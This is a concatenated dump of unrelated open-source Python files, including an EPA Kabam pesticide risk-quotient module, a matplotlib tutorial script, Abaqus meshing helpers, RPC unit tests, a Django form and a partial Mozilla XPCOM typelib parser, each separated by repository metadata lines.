(tested_mammal_bw / 1000) / self.mammal_weights)) ** 0.25)
else:
chronic_toxicity = (mammalian_chronic_endpt) * (((
(tested_mammal_bw / 1000) / self.mammal_weights)) ** 0.25)
return chronic_toxicity
def chronic_diet_based_tox_mammals(self, mammalian_chronic_endpt, mammalian_chronic_endpt_unit):
"""
:description chronic diet-based toxicity for mammals
:unit (mg/kg-diet)
:expression no known documentation; see EPA OPP Kabam spreadsheet
:param mammalian_chronic_endpt: (ppm or mg/kg-diet)
:return:
"""
chronic_toxicity = np.array([], dtype = 'float')
if (mammalian_chronic_endpt_unit == 'ppm'):
chronic_toxicity = mammalian_chronic_endpt
else:
chronic_toxicity = mammalian_chronic_endpt * 20.
return chronic_toxicity
def acute_rq_dose_mammals(self):
"""
:description Dose-based risk quotient for mammals
:unit none
:expression no known documentation; see EPA OPP Kabam spreadsheet
:param dose_based_eec_mammals
:param acute_dose_based_tox_mammals
:return:
"""
acute_rq_dose_mamm = self.dose_based_eec_mammals / self.dose_based_tox_mammals
return acute_rq_dose_mamm
def chronic_rq_dose_mammals(self):
"""
:description Chronic dose-based risk quotient for mammals
:unit none
:expression no known documentation; see EPA OPP Kabam spreadsheet
:param dose_based_eec_mammals: self defined
:param chronic_dose_based_tox_mammals: self defined
:return:
"""
chronic_rq_dose_mamm = self.dose_based_eec_mammals / self.chronic_dose_based_tox_mamm
return chronic_rq_dose_mamm
def acute_rq_diet_mammals(self, diet_based_eec, mammal_lc50):
"""
:description Acute diet-based risk quotient for mammals
:unit none
:expression no known documentation; see EPA OPP Kabam spreadsheet
:param mammal_lc50: mammalian lc50 (mg/kg-diet)
:param diet_based_eec: diet-based eec for mammal (mg pesticide / kg-diet)
:return:
"""
acute_rq_diet_mamm = np.array([], dtype = 'float')
acute_rq_diet_mamm = diet_based_eec / mammal_lc50
return acute_rq_diet_mamm
def chronic_rq_diet_mammals(self, diet_based_eec, mammalian_chronic_endpt, mammalian_chronic_endpt_unit):
"""
:description chronic diet-based risk quotient for mammals
:unit none
:expression no known documentation; see EPA OPP Kabam spreadsheet
:param mammalian_chronic_endpt: (ppm or mg/kg-diet)
:param diet_based_eec: diet-based eec for mammal (mg pesticide / kg-diet)
:return:
"""
chronic_rq_diet_mamm = np.array([], dtype = 'float')
if (mammalian_chronic_endpt_unit == 'ppm'):
chronic_rq_diet_mamm = diet_based_eec / mammalian_chronic_endpt
else:
chronic_rq_diet_mamm = diet_based_eec / (mammalian_chronic_endpt * 20.)
return chronic_rq_diet_mamm
def acute_rq_dose_birds(self):
"""
:description Dose-based risk quotient for birds
:unit none
:expression no known documentation; see EPA OPP Kabam spreadsheet
:param dose_based_eec_birds: self defined
:param acute_dose_based_tox_birds: self defined
:return:
"""
acute_rq_dose_bird = self.dose_based_eec_birds / self.dose_based_tox_birds
return acute_rq_dose_bird
def acute_rq_diet_birds(self, diet_based_eec, bird_lc50):
"""
:description Acute diet-based risk quotient for birds
:unit none
:expression no known documentation; see EPA OPP Kabam spreadsheet
:param bird_lc50: avian lc50 (mg/kg-diet)
:param diet_based_eec: diet-based eec for birds (mg pesticide / kg-diet)
:note in the OPP spreadsheet 'bird_lc50' may be input as 'N/A' or have
a value; in the case it is assigned 'N/A' this method should assign
'acute_rq_diet_bird' a value of 'N/A' -- as implemented below it will
either assign a 'nan' or issue a divide by zero error.
:return:
"""
acute_rq_diet_bird = diet_based_eec / bird_lc50
return acute_rq_diet_bird
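# Hedged sketch addressing the note above (an editorial assumption, not the
# OPP spreadsheet behavior): coercing 'N/A' inputs to NaN before dividing
# would yield NaN risk quotients instead of a type or divide error:
#
#     lc50 = pd.to_numeric(pd.Series(bird_lc50), errors='coerce')
#     acute_rq_diet_bird = diet_based_eec / lc50  # NaN wherever LC50 was 'N/A'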
def chronic_rq_diet_birds(self, diet_based_eec, avian_chronic_endpt):
"""
:description chronic diet-based risk quotient for birds
:unit none
:expression no known documentation; see EPA OPP Kabam spreadsheet
:param avian_chronic_endpt: avian noaec (mg/kg-diet)
:param diet_based_eec: diet-based eec for birds (mg pesticide / kg-diet)
:return:
"""
chronic_rq_diet_bird = np.array([], dtype = 'float')
chronic_rq_diet_bird = diet_based_eec / avian_chronic_endpt
return chronic_rq_diet_bird
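
# ---------------------------------------------------------------------------
# Editorial usage sketch (hedged; not part of the original module): exercises
# the respiratory-uptake chain (Eqs. A5.2a/b, A5.2, A6a, A6) for one
# hypothetical organism. All values below (conc_do, kow, weight, content
# fractions) are illustrative assumptions, not model defaults.
if __name__ == "__main__":
    kf = KabamFunctions()
    kf.conc_do = pd.Series([8.0])    # dissolved oxygen, mg O2/L (assumed)
    kf.kow = pd.Series([1.0e6])      # octanol-water partition coefficient (assumed)
    wet_wgt = pd.Series([0.01])      # wet weight, kg (assumed)
    gv = kf.ventilation_rate(wet_wgt)            # Gv, Eq. A5.2b
    ew = kf.pest_uptake_eff_bygills()            # Ew, Eq. A5.2a
    k1 = kf.aq_animal_k1_calc(ew, gv, wet_wgt)   # K1, Eq. A5.2
    kbw = kf.animal_water_part_coef(pd.Series([0.05]), pd.Series([0.2]),
                                    pd.Series([0.75]), beta=0.035)  # Kbw, Eq. A6a
    k2 = kf.aq_animal_k2_calc(k1, kbw)           # K2, Eq. A6
    print('k1 = %.1f L/kg-d, k2 = %.5f /d' % (k1[0], k2[0]))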
license: unlicense | hash: -2,566,465,609,833,547,000 | line_mean: 44.97177 | line_max: 134 | alpha_frac: 0.625641 | autogenerated: false | ratio: 3.258099 | config_test: false | has_no_keywords: false | few_assignments: false

repo: SunPowered/python-workshop-2015 | path: code/session3/matplotlib_package.py | copies: 1 | size: 3980
# -*- coding: utf-8 -*-
"""
matplotlib_package.py - 3 Data Analysis
The dominant plotting library in Python was constructed to
emulate the standard MATLAB plotting syntax and functionality,
hence the name 'matplotlib'.
There are several ways to interface with matplotlib. One can plot
interactively, which is useful for on the fly visualization. One
can subclass or wrap consistent and repetitive functionality
to customize plots. Plotting options can be defined on the local
operating system, if desired.
It is important to configure the plotting backend for your system;
in Spyder this is done under iPython settings->Graphics. For this
module, inline plotting is recommended.
Resources:
http://matplotlib.org/examples/pylab_examples/
"""
import os
import numpy as np
np.random.seed(12345)
plot_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), os.pardir, 'plots'))
SAVE_FIGS = False
N_FIG = 1
DEBUG = False
def more():
global SAVE_FIGS, N_FIG, plot_dir, DEBUG
if SAVE_FIGS:
plot_name = os.path.join(plot_dir, "plot{}.png".format(N_FIG))
plt.savefig(plot_name)
N_FIG += 1
plt.show()
if not DEBUG:
print
raw_input("More...")
print
"""
Interactive Plotting
By utilizing the matplotlib module pyplot, one easily has access
to all the standard plotting and customization mechanisms
"""
from matplotlib import pyplot as plt
print
print "Plot 1"
time = np.linspace(0, 6 * np.pi)
data = 2 * np.sin(time) + 3 * np.cos(time)
plt.plot(time, data)
plt.title('A title')
plt.xlabel('Time')
plt.ylabel('Data')
plt.savefig(os.path.join(plot_dir, 'plot_example.png'))
"""
Multiple series can be plotted at once, with a format-string
argument after each series specifying linestyle and colour.
Each plot is made up of a figure, axes, and plot artists. If
we keep plotting and changing options, the same axes on the
same figure will be modified in place.
Plots amend the current figure, use the 'figure' function
to start a new figure. Alternatively, we can use
the 'show' function to force the current figure to be
rendered.
"""
more()
print
print 'Plot 2'
#plt.figure()
sin_data = np.sin(time)
cos_data = np.cos(time)
plt.plot(time, cos_data, '-b', time, sin_data, '*r')
plt.title('Sin/Cos')
plt.xlabel('Time')
plt.ylabel('Data')
plt.legend(['Cosine', 'Sine'])
"""
Some more advanced figures include multiple axes on
one figure. These are called 'subplots', and can be
created and modified as follows.
"""
more()
print
print "Plot 3"
ax = plt.subplot(2, 1, 1) # 2 rows, 1 col, current plot 1
plt.plot(time, sin_data, "--k")
plt.title("Damped/Undamped Oscillator")
plt.ylabel("Sin")
plt.xlabel('Time')
damped_sin = np.sin(time) * np.exp(-time / 5)
plt.subplot(2, 1, 2) # This goes to the next subplot axes
plt.plot(time, damped_sin, '-g')
plt.ylabel("Damped Sin")
plt.xlabel("Time")
"""
There are many other types of plots that are available
"""
more()
print
print "Plot 4"
hist_data = np.random.randn(2000)
plt.hist(hist_data, color="g", bins=50)
plt.title("Normally Distributed Data")
more()
"""
With some careful manipulation, advanced plot types are
also possible, such as a heatmap
"""
import matplotlib.mlab as mlab # Matlab compatible names
import matplotlib.cm as cm # Colour maps
print
print "Plot 5"
delta = 0.025
x = y = np.arange(-3.0, 3.0, delta)
X, Y = np.meshgrid(x, y)
Z1 = mlab.bivariate_normal(X, Y, 1.0, 1.0, 0.0, 0.0)
Z2 = mlab.bivariate_normal(X, Y, 1.5, 0.5, 1, 1)
Z = Z2 - Z1 # difference of Gaussians
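# Editor's note (hedged): matplotlib.mlab.bivariate_normal was deprecated in
# matplotlib 2.2 and removed in later releases; on modern installs the same
# surfaces can be built with scipy.stats, where the sigma arguments above
# become variances on the covariance diagonal:
#
#     from scipy.stats import multivariate_normal
#     pos = np.dstack((X, Y))
#     Z1 = multivariate_normal([0.0, 0.0], [[1.0, 0.0], [0.0, 1.0]]).pdf(pos)
#     Z2 = multivariate_normal([1.0, 1.0], [[2.25, 0.0], [0.0, 0.25]]).pdf(pos)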
im = plt.imshow(Z, interpolation='bilinear', cmap=cm.RdYlGn,
origin='lower', extent=[-3, 3, -3, 3],
vmax=abs(Z).max(), vmin=-abs(Z).max())
plt.title("Heatmaps!")
plt.xlabel("X (mm)")
plt.ylabel("Y (mm)")
more()
license: gpl-2.0 | hash: 380,881,805,217,125,600 | line_mean: 23.875 | line_max: 87 | alpha_frac: 0.660553 | autogenerated: false | ratio: 3.186549 | config_test: false | has_no_keywords: false | few_assignments: false

repo: mengomarlene/2DImage2Mesh | path: Image2MeshToolbox.py | copies: 1 | size: 2763
#-----------------------------------------------------
def clearUnwantedNodes(model):
from abaqusConstants import ON
## FOR EACH PART: CLEAR UNWANTED NODES AND DELETE SHELL SECTIONS
for myPart in model.parts.values():
## clean node list (remove nodes not in the zMin plane)
#1/ find zMin...
zCoord = list()
nodeLabels = list()
for node in myPart.nodes:
zCoord.append(node.coordinates[2])
nodeLabels.append(node.label)
minZ = min(zCoord)
#2/ build a list of nodes not in zMin
remNodes = [nodeLabels[i] for i, x in enumerate(zCoord) if x > minZ+1e-10]
#3/ remove those nodes (they have to be part of a set to do so, thus first create set - then delete nodes from set - then delete set)
if len(remNodes):
nodesSetToBeRem = myPart.SetFromNodeLabels(nodeLabels=remNodes, name='remNodeSet')
myPart.deleteNode(nodes=nodesSetToBeRem, deleteUnreferencedNodes=ON)
del nodesSetToBeRem
del nodeLabels  # that list is not needed any more
## delete shell section assignments
for sa in myPart.sectionAssignments: del sa
#-----------------------------------------------------
def createSketch(model, elemSet):
mySketch = model.ConstrainedSketch(name='mySketch', sheetSize=30.0)
# loop over elements of the set and their edges
for ele in elemSet.elements:
for edge in ele.getElemEdges():
# an edge that belongs to only one element lies on the boundary (a free or contact edge); those are the targets used to build the geometry
if len(edge.getElements())==1:
# reads nodes coordinates of target elements
node = edge.getNodes()
pt1 = (node[0].coordinates[0],node[0].coordinates[1])
pt2 = (node[1].coordinates[0],node[1].coordinates[1])
# create geometrical line between those nodes
mySketch.Line(point1=pt1,point2=pt2)
return mySketch
#-----------------------------------------------------
def addPartsToAssembly(model):
from abaqusConstants import ON
## add new parts to assembly - only after the initial instance has been deleted, as they are not of the same type
for part in model.parts.values():
myInstanceName = part.name.split('_')[0]+'_instance'
model.rootAssembly.Instance(myInstanceName, part, dependent=ON)
#-----------------------------------------------------
def deleteOldFeatures(model):
# delete old part,instance,sections,...
del model.rootAssembly.features['PART-1-1']
del model.parts['PART-1']
for sName in model.sections.keys():
del model.sections[sName]
#-----------------------------------------------------
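# Editorial usage sketch (hedged; not part of the original toolbox): a driver
# script would typically run these helpers in order inside the Abaqus
# scripting environment. The model key and set name below are assumptions.
#
#     from abaqus import mdb
#     myModel = mdb.models['Model-1']
#     clearUnwantedNodes(myModel)
#     # mySketch = createSketch(myModel, myModel.parts['PART-1'].sets['ALL'])
#     deleteOldFeatures(myModel)
#     addPartsToAssembly(myModel)
#-----------------------------------------------------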
license: gpl-2.0 | hash: -4,718,912,397,360,695,000 | line_mean: 49.254545 | line_max: 141 | alpha_frac: 0.588853 | autogenerated: false | ratio: 4.111607 | config_test: false | has_no_keywords: false | few_assignments: false

repo: biosustain/venom | path: tests/rpc/test_method.py | copies: 1 | size: 3948
from collections import namedtuple
from unittest import SkipTest
from venom import Empty
from venom import Message
from venom.common import Value, BoolValue
from venom.common.types import JSONValue
from venom.converter import Converter
from venom.fields import Int32, String
from venom.rpc import Service, rpc
from venom.rpc.method import HTTPVerb, MethodDescriptor
from venom.rpc.stub import Stub
from venom.rpc.test_utils import AioTestCase
class MethodTestCase(AioTestCase):
async def test_method_override(self):
Snake = namedtuple('Snake', ('name', 'size'))
class SnakeMessage(Message):
name = String()
size = Int32()
class SnakeConverter(Converter):
wire = SnakeMessage
python = Snake
def resolve(self, message: SnakeMessage) -> Snake:
return Snake(message.name, message.size)
def format(self, value: Snake) -> SnakeMessage:
return SnakeMessage(name=value.name, size=value.size)
class SnakeStub(Stub):
@rpc(SnakeMessage, SnakeMessage)
def grow(self): pass
self.assertEqual(set(SnakeStub.__methods__.keys()), {"grow"})
self.assertEqual(SnakeStub.__methods__['grow'].request, SnakeMessage)
self.assertEqual(SnakeStub.__methods__['grow'].response, SnakeMessage)
# TODO test without stub (auto-generated request message)
class SnakeService(Service):
class Meta:
converters = [SnakeConverter()]
stub = SnakeStub
@rpc
def grow(self, request: Snake) -> Snake:
return Snake(name=request.name, size=request.size + 1)
self.assertEqual(await SnakeService().grow(SnakeMessage('snek', 2)), SnakeMessage('snek', 3))
self.assertEqual(await SnakeService.grow.invoke(SnakeService(), SnakeMessage(name='snek', size=2)),
SnakeMessage(name='snek', size=3))
self.assertEqual(await SnakeService.grow.invoke(SnakeService(), SnakeMessage(name='snek')),
SnakeMessage(name='snek', size=1))
def test_method_http(self):
class FooService(Service):
pass
self.assertEqual(MethodDescriptor(Empty, Empty).prepare(FooService(), 'bar').http_path, '/foo/bar')
self.assertEqual(MethodDescriptor(Empty, Empty).prepare(FooService(), 'foo').http_method, HTTPVerb.POST)
self.assertEqual(MethodDescriptor(Empty, Empty,
http_path='./bar').prepare(FooService(), 'foo').http_path, '/foo/bar')
self.assertEqual(MethodDescriptor(Empty, Empty, http_method=HTTPVerb.POST).http_method, HTTPVerb.POST)
self.assertEqual(MethodDescriptor(Empty, Empty, http_method=HTTPVerb.DELETE).http_method, HTTPVerb.DELETE)
def test_method_http_rule_params(self):
class Snake(Message):
id = Int32()
name = String()
size = Int32()
class FooService(Service):
pass
self.assertEqual(MethodDescriptor(Empty, Empty)
.prepare(FooService(), 'foo')
.http_path_parameters(), set())
self.assertEqual(MethodDescriptor(Snake, Snake, http_path='./{id}')
.prepare(FooService(), 'foo')
.http_path_parameters(), {'id'})
self.assertEqual(MethodDescriptor(Snake, Snake, http_path='./{name}/{id}')
.prepare(FooService(), 'foo')
.http_path_parameters(), {'id', 'name'})
@SkipTest
async def test_json_method(self):
class FooService(Service):
@rpc
def get_json(self) -> JSONValue:
return {"foo": True}
self.assertEqual(await FooService.get_json.invoke(FooService(), Empty()),
Value(bool_value=BoolValue(True)))
license: mit | hash: 881,615,685,516,078,600 | line_mean: 38.878788 | line_max: 114 | alpha_frac: 0.607903 | autogenerated: false | ratio: 3.967839 | config_test: true | has_no_keywords: false | few_assignments: false

repo: wampixel/sciMS | path: index/forms.py | copies: 1 | size: 1025
from django import forms
class registration(forms.Form):
username = forms.CharField(max_length=100,
widget=forms.TextInput(attrs={'class': 'form-control',
'placeholder' : 'Username'}))
nom = forms.CharField(max_length=100,
widget=forms.TextInput(attrs={'class': 'form-control',
'placeholder' : 'Nom'}))
prenom = forms.CharField(max_length=100,
widget=forms.TextInput(attrs={'class': 'form-control',
'placeholder' : 'Prenom'}))
passwd = forms.CharField(widget=forms.PasswordInput(attrs={'class': 'form-control',
'placeholder' : 'password'}))
email = forms.CharField(widget=forms.TextInput(attrs={'class': 'form-control',
'placeholder' : 'xyz@example.fr'}))
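
# Editorial usage sketch (hedged; not part of sciMS): a view would typically
# bind and validate this form as below. The view and template names are
# illustrative assumptions.
#
#     from django.shortcuts import render
#
#     def register(request):
#         form = registration(request.POST or None)
#         if request.method == 'POST' and form.is_valid():
#             username = form.cleaned_data['username']
#             # ... create the user, then redirect ...
#         return render(request, 'index/register.html', {'form': form})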
license: gpl-3.0 | hash: 5,774,265,578,307,167,000 | line_mean: 63.125 | line_max: 96 | alpha_frac: 0.470244 | autogenerated: false | ratio: 5.203046 | config_test: false | has_no_keywords: false | few_assignments: false

repo: Yukarumya/Yukarum-Redfoxes | path: xpcom/typelib/xpt/tools/xpt.py | copies: 1 | size: 56333
#!/usr/bin/env python
# Copyright 2010,2011 Mozilla Foundation. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE MOZILLA FOUNDATION ``AS IS'' AND ANY
# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE MOZILLA FOUNDATION OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY
# OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# The views and conclusions contained in the software and documentation
# are those of the authors and should not be interpreted as representing
# official policies, either expressed or implied, of the Mozilla
# Foundation.
"""
A module for working with XPCOM Type Libraries.
The XPCOM Type Library File Format is described at:
http://www.mozilla.org/scriptable/typelib_file.html . It is used
to provide type information for calling methods on XPCOM objects
from scripting languages such as JavaScript.
This module provides a set of classes representing the parts of
a typelib in a high-level manner, as well as methods for reading
and writing them from files.
The usable public interfaces are currently:
Typelib.read(input_file) - read a typelib from a file on disk or file-like
object, return a Typelib object.
xpt_dump(filename) - read a typelib from a file on disk, dump
the contents to stdout in a human-readable
format.
Typelib() - construct a new Typelib object
Interface() - construct a new Interface object
Method() - construct a new object representing a method
defined on an Interface
Constant() - construct a new object representing a constant
defined on an Interface
Param() - construct a new object representing a parameter
to a method
SimpleType() - construct a new object representing a simple
data type
InterfaceType() - construct a new object representing a type that
is an IDL-defined interface
"""
from __future__ import with_statement
import os
import sys
import struct
import operator
# header magic
XPT_MAGIC = "XPCOM\nTypeLib\r\n\x1a"
TYPELIB_VERSION = (1, 2)
class FileFormatError(Exception):
pass
class DataError(Exception):
pass
# Magic for creating enums
def M_add_class_attribs(attribs):
def foo(name, bases, dict_):
for v, k in attribs:
dict_[k] = v
return type(name, bases, dict_)
return foo
def enum(*names):
class Foo(object):
__metaclass__ = M_add_class_attribs(enumerate(names))
def __setattr__(self, name, value): # this makes it read-only
raise NotImplementedError
return Foo()
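# For example, Tags = enum('int8', 'int16') yields an object with
# Tags.int8 == 0 and Tags.int16 == 1, and any attribute assignment raises
# NotImplementedError: a minimal read-only enum for Python 2, predating the
# stdlib enum module.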
# Descriptor types as described in the spec
class Type(object):
"""
Data type of a method parameter or return value. Do not instantiate
this class directly. Rather, use one of its subclasses.
"""
_prefixdescriptor = struct.Struct(">B")
Tags = enum(
# The first 18 entries are SimpleTypeDescriptor
'int8',
'int16',
'int32',
'int64',
'uint8',
'uint16',
'uint32',
'uint64',
'float',
'double',
'boolean',
'char',
'wchar_t',
'void',
# the following four values are only valid as pointers
'nsIID',
'DOMString',
'char_ptr',
'wchar_t_ptr',
# InterfaceTypeDescriptor
'Interface',
# InterfaceIsTypeDescriptor
'InterfaceIs',
# ArrayTypeDescriptor
'Array',
# StringWithSizeTypeDescriptor
'StringWithSize',
# WideStringWithSizeTypeDescriptor
'WideStringWithSize',
# XXX: These are also SimpleTypes (but not in the spec)
# http://hg.mozilla.org/mozilla-central/annotate/0e0e2516f04e/xpcom/typelib/xpt/tools/xpt_dump.c#l69
'UTF8String',
'CString',
'AString',
'jsval',
)
def __init__(self, pointer=False, reference=False):
self.pointer = pointer
self.reference = reference
if reference and not pointer:
raise Exception("If reference is True pointer must be True too")
def __cmp__(self, other):
return (
# First make sure we have two Types of the same type (no pun intended!)
cmp(type(self), type(other)) or
cmp(self.pointer, other.pointer) or
cmp(self.reference, other.reference)
)
@staticmethod
def decodeflags(byte):
"""
Given |byte|, an unsigned uint8 containing flag bits,
decode the flag bits as described in
http://www.mozilla.org/scriptable/typelib_file.html#TypeDescriptor
and return a dict of flagname: (True|False) suitable
for passing to Type.__init__ as **kwargs.
"""
return {'pointer': bool(byte & 0x80),
'reference': bool(byte & 0x20),
}
def encodeflags(self):
"""
Encode the flag bits of this Type object. Returns a byte.
"""
flags = 0
if self.pointer:
flags |= 0x80
if self.reference:
flags |= 0x20
return flags
@staticmethod
def read(typelib, map, data_pool, offset):
"""
Read a TypeDescriptor at |offset| from the mmaped file |map| with
data pool offset |data_pool|. Returns (Type, next offset),
where |next offset| is an offset suitable for reading the data
following this TypeDescriptor.
"""
start = data_pool + offset - 1
(data,) = Type._prefixdescriptor.unpack_from(map, start)
# first three bits are the flags
flags = data & 0xE0
flags = Type.decodeflags(flags)
# last five bits is the tag
tag = data & 0x1F
offset += Type._prefixdescriptor.size
t = None
if tag <= Type.Tags.wchar_t_ptr or tag >= Type.Tags.UTF8String:
t = SimpleType.get(data, tag, flags)
elif tag == Type.Tags.Interface:
t, offset = InterfaceType.read(typelib, map, data_pool, offset, flags)
elif tag == Type.Tags.InterfaceIs:
t, offset = InterfaceIsType.read(typelib, map, data_pool, offset, flags)
elif tag == Type.Tags.Array:
t, offset = ArrayType.read(typelib, map, data_pool, offset, flags)
elif tag == Type.Tags.StringWithSize:
t, offset = StringWithSizeType.read(typelib, map, data_pool, offset, flags)
elif tag == Type.Tags.WideStringWithSize:
t, offset = WideStringWithSizeType.read(typelib, map, data_pool, offset, flags)
return t, offset
def write(self, typelib, file):
"""
Write a TypeDescriptor to |file|, which is assumed
to be seeked to the proper position. For types other than
SimpleType, this is not sufficient for writing the TypeDescriptor,
and the subclass method must be called.
"""
file.write(Type._prefixdescriptor.pack(self.encodeflags() | self.tag))
class SimpleType(Type):
"""
A simple data type. (SimpleTypeDescriptor from the typelib specification.)
"""
_cache = {}
def __init__(self, tag, **kwargs):
Type.__init__(self, **kwargs)
self.tag = tag
def __cmp__(self, other):
return (
Type.__cmp__(self, other) or
cmp(self.tag, other.tag)
)
@staticmethod
def get(data, tag, flags):
"""
Get a SimpleType object representing |data| (a TypeDescriptorPrefix).
May return an already-created object. If no cached object is found,
construct one with |tag| and |flags|.
"""
if data not in SimpleType._cache:
SimpleType._cache[data] = SimpleType(tag, **flags)
return SimpleType._cache[data]
def __str__(self):
s = "unknown"
if self.tag == Type.Tags.char_ptr and self.pointer:
return "string"
if self.tag == Type.Tags.wchar_t_ptr and self.pointer:
return "wstring"
for t in dir(Type.Tags):
if self.tag == getattr(Type.Tags, t):
s = t
break
if self.pointer:
if self.reference:
s += " &"
else:
s += " *"
return s
class InterfaceType(Type):
"""
A type representing a pointer to an IDL-defined interface.
(InterfaceTypeDescriptor from the typelib specification.)
"""
_descriptor = struct.Struct(">H")
def __init__(self, iface, pointer=True, **kwargs):
if not pointer:
raise DataError("InterfaceType is not valid with pointer=False")
Type.__init__(self, pointer=pointer, **kwargs)
self.iface = iface
self.tag = Type.Tags.Interface
def __cmp__(self, other):
return (
Type.__cmp__(self, other) or
# When comparing interface types, only look at the name.
cmp(self.iface.name, other.iface.name) or
cmp(self.tag, other.tag)
)
@staticmethod
def read(typelib, map, data_pool, offset, flags):
"""
Read an InterfaceTypeDescriptor at |offset| from the mmaped
file |map| with data pool offset |data_pool|.
Returns (InterfaceType, next offset),
where |next offset| is an offset suitable for reading the data
following this InterfaceTypeDescriptor.
"""
if not flags['pointer']:
return None, offset
start = data_pool + offset - 1
(iface_index,) = InterfaceType._descriptor.unpack_from(map, start)
offset += InterfaceType._descriptor.size
iface = None
# interface indices are 1-based
if iface_index > 0 and iface_index <= len(typelib.interfaces):
iface = typelib.interfaces[iface_index - 1]
return InterfaceType(iface, **flags), offset
def write(self, typelib, file):
"""
Write an InterfaceTypeDescriptor to |file|, which is assumed
to be seeked to the proper position.
"""
Type.write(self, typelib, file)
# write out the interface index (1-based)
file.write(InterfaceType._descriptor.pack(typelib.interfaces.index(self.iface) + 1))
def __str__(self):
if self.iface:
return self.iface.name
return "unknown interface"
class InterfaceIsType(Type):
"""
A type representing an interface described by one of the other
arguments to the method. (InterfaceIsTypeDescriptor from the
typelib specification.)
"""
_descriptor = struct.Struct(">B")
_cache = {}
def __init__(self, param_index, pointer=True, **kwargs):
if not pointer:
raise DataError("InterfaceIsType is not valid with pointer=False")
Type.__init__(self, pointer=pointer, **kwargs)
self.param_index = param_index
self.tag = Type.Tags.InterfaceIs
def __cmp__(self, other):
return (
Type.__cmp__(self, other) or
cmp(self.param_index, other.param_index) or
cmp(self.tag, other.tag)
)
@staticmethod
def read(typelib, map, data_pool, offset, flags):
"""
Read an InterfaceIsTypeDescriptor at |offset| from the mmaped
file |map| with data pool offset |data_pool|.
Returns (InterfaceIsType, next offset),
where |next offset| is an offset suitable for reading the data
following this InterfaceIsTypeDescriptor.
May return a cached value.
"""
if not flags['pointer']:
return None, offset
start = data_pool + offset - 1
(param_index,) = InterfaceIsType._descriptor.unpack_from(map, start)
offset += InterfaceIsType._descriptor.size
if param_index not in InterfaceIsType._cache:
InterfaceIsType._cache[param_index] = InterfaceIsType(param_index, **flags)
return InterfaceIsType._cache[param_index], offset
def write(self, typelib, file):
"""
Write an InterfaceIsTypeDescriptor to |file|, which is assumed
to be seeked to the proper position.
"""
Type.write(self, typelib, file)
file.write(InterfaceIsType._descriptor.pack(self.param_index))
def __str__(self):
return "InterfaceIs *"
class ArrayType(Type):
"""
A type representing an Array of elements of another type, whose
size and length are passed as separate parameters to a method.
(ArrayTypeDescriptor from the typelib specification.)
"""
_descriptor = struct.Struct(">BB")
def __init__(self, element_type, size_is_arg_num, length_is_arg_num,
pointer=True, **kwargs):
if not pointer:
raise DataError("ArrayType is not valid with pointer=False")
Type.__init__(self, pointer=pointer, **kwargs)
self.element_type = element_type
self.size_is_arg_num = size_is_arg_num
self.length_is_arg_num = length_is_arg_num
self.tag = Type.Tags.Array
def __cmp__(self, other):
return (
Type.__cmp__(self, other) or
cmp(self.element_type, other.element_type) or
cmp(self.size_is_arg_num, other.size_is_arg_num) or
cmp(self.length_is_arg_num, other.length_is_arg_num) or
cmp(self.tag, other.tag)
)
@staticmethod
def read(typelib, map, data_pool, offset, flags):
"""
Read an ArrayTypeDescriptor at |offset| from the mmaped
file |map| with data pool offset |data_pool|.
Returns (ArrayType, next offset),
where |next offset| is an offset suitable for reading the data
following this ArrayTypeDescriptor.
"""
if not flags['pointer']:
return None, offset
start = data_pool + offset - 1
(size_is_arg_num, length_is_arg_num) = ArrayType._descriptor.unpack_from(map, start)
offset += ArrayType._descriptor.size
t, offset = Type.read(typelib, map, data_pool, offset)
return ArrayType(t, size_is_arg_num, length_is_arg_num, **flags), offset
def write(self, typelib, file):
"""
Write an ArrayTypeDescriptor to |file|, which is assumed
to be seeked to the proper position.
"""
Type.write(self, typelib, file)
file.write(ArrayType._descriptor.pack(self.size_is_arg_num,
self.length_is_arg_num))
self.element_type.write(typelib, file)
def __str__(self):
return "%s []" % str(self.element_type)
class StringWithSizeType(Type):
"""
A type representing a UTF-8 encoded string whose size and length
are passed as separate arguments to a method. (StringWithSizeTypeDescriptor
from the typelib specification.)
"""
_descriptor = struct.Struct(">BB")
def __init__(self, size_is_arg_num, length_is_arg_num,
pointer=True, **kwargs):
if not pointer:
raise DataError("StringWithSizeType is not valid with pointer=False")
Type.__init__(self, pointer=pointer, **kwargs)
self.size_is_arg_num = size_is_arg_num
self.length_is_arg_num = length_is_arg_num
self.tag = Type.Tags.StringWithSize
def __cmp__(self, other):
return (
Type.__cmp__(self, other) or
cmp(self.size_is_arg_num, other.size_is_arg_num) or
cmp(self.length_is_arg_num, other.length_is_arg_num) or
cmp(self.tag, other.tag)
)
@staticmethod
def read(typelib, map, data_pool, offset, flags):
"""
Read an StringWithSizeTypeDescriptor at |offset| from the mmaped
file |map| with data pool offset |data_pool|.
Returns (StringWithSizeType, next offset),
where |next offset| is an offset suitable for reading the data
following this StringWithSizeTypeDescriptor.
"""
if not flags['pointer']:
return None, offset
start = data_pool + offset - 1
(size_is_arg_num, length_is_arg_num) = StringWithSizeType._descriptor.unpack_from(map, start)
offset += StringWithSizeType._descriptor.size
return StringWithSizeType(size_is_arg_num, length_is_arg_num, **flags), offset
def write(self, typelib, file):
"""
Write a StringWithSizeTypeDescriptor to |file|, which is assumed
to be seeked to the proper position.
"""
Type.write(self, typelib, file)
file.write(StringWithSizeType._descriptor.pack(self.size_is_arg_num,
